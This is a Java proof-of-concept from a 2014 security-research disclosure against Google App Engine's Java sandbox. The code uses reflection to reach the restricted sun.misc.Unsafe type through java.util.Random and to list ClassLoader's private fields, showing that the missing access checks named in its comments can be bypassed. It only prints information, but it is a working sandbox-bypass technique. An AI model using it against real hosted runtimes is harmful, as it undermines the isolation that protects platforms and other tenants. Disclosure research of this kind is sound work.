/*## (c) SECURITY EXPLORATIONS    2014 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

/* #17 Reflection API calls allowed for prohibited classes (sun.* package)    */
/* [com.google.apphosting.runtime.security.shared.intercept.java.lang.Class_  */
/*  no checkPackageAccess() call in Reflection API methods]                   */
/* #18 Reflection API calls allowed against declared members                  */
/* [com.google.apphosting.runtime.security.shared.intercept.java.lang.Class_  */
/*  no checkMemberAccess() like call in Reflection API methods]               */

import java.lang.*;
import java.lang.reflect.*;
import java.lang.invoke.*;
import java.io.*;
import java.net.*;
import java.nio.*;
import java.security.*;

public class POC13 {

 public static Object runpoc(Object arg,PrintWriter out) {
  Object res=null;

  try {
   URL utab[]=(URL[])arg;

   out.println("sm = "+System.getSecurityManager());   

   Class c=Class.forName("java.util.Random");
   Field f=c.getDeclaredField("unsafe");

   c=f.getType();

   out.println("METHODS of "+c);

   Method mtab[]=c.getMethods();
   for(int i=0;i<mtab.length;i++) {
    out.println("- "+mtab[i]);
   }

   c=Class.forName("java.lang.ClassLoader");

   out.println("DECLARED FIELDS OF "+c);

   Field ftab[]=c.getDeclaredFields();
   for(int i=0;i<ftab.length;i++) {
    out.println("- "+ftab[i]);
   }
   
  } catch(Throwable t) {
   out.println("exception: "+t);
  }

  return res;
 }

}
